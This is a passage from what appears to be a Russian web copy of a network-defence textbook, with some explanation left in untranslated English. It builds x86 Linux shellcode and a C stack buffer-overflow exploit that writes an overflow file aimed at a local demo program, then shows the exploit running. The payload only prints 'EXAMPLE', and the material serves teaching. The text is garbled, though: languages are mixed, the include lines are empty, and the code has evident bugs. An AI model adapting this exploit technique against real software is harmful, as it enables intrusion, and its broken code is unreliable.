Читаем Защита от хакеров корпоративных сетей полностью

movb $0x1, %al

int $0x80

string:

call code

A call pushes the address of the next instruction onto the stack and then does a jmp

to the specified address. In this case the next instruction after is

actually the location of our string EXAMPLE. So by doing a jump and then a call, we

can get an address of the data in which we’re interested. So now we redirect the

execution back up to

.string \“EXAMPLE\n\”

В конечном счете программа переполнения буфера выглядит так:

/****** Shellcode dev with GCC *****/

#include

#include

char shellcode[] =

“\xeb\x16” /* jmp string */

“\x31\xdb” /* xor %EBX, %EBX */

“\x31\xd2” /* xor %EDX, %EDX */

“\x31\xc0” /* xor %EAX, %EAX */

“\x59” /* pop %ECX */

“\xbb\x01\x00\x00\x00” /* mov $0x1,%EBX */

“\xb2\x09” /* mov $0x9,%dl */

“\xb0\x04” /* mov $0x04,%al */

“\xcd\x80” /* int $0x80 */

“\xb0\x01” /* mov $0x1, %al */

“\xcd\x80” /* int $0x80 */

“\xe8\xe5\xff\xff\xff” /* call code */

“EXAMPLE\n”

;

#define VULNAPP «./bof»

#define OFFSET 1500

unsigned long get_ESP(void)

{

__asm__(«movl %ESP,%EAX»);

}

main(int argc, char **argv)

{

unsigned long addr;

FILE *badfile;

char buffer[1024];

fprintf(stderr, «Using Offset: 0x%x\nShellcode Size:

%d\n»,addr,sizeof(shellcode));

addr = get_ESP+OFFSET;

/* Make exploit buffer */

memset(&buffer,0x41,1024);

buffer[12] = addr & 0x000000ff;

buffer[13] = (addr & 0x0000ff00) >> 8;

buffer[14] = (addr & 0x00ff0000) >> 16;

buffer[15] = (addr & 0xff000000) >> 24;

memcpy(&buffer[(sizeof(buffer) –

sizeof(shellcode))],shellcode,sizeof(shellcode));

/* put it in badfile */

badfile = fopen(“./badfile”,“w”);

fwrite(buffer,1024,1,badfile);

fclose(badfile);

Пример выполнения программы переполнения буфера представлен ниже:

sh-2.04# gcc sample4.c -o sample4

sh-2.04# gcc exploit.c -o exploit

sh-2.04# ./exploit

Using Offset: 0x8048591

Shellcode Size: 38

sh-2.04# od -t x2 badfile

0000000 4141 4141 4141 4141 4141 4141 fc04 bfff

#########

*

0001720 4141 4141 4141 4141 4141 16eb db31 d231

0001740 c031 bb59 0001 0000 09b2 04b0 80cd 01b0

0001760 80cd e5e8 ffff 45ff 4158 504d 454c 000a

2000

sh-2.04# ./sample4

EXAMPLE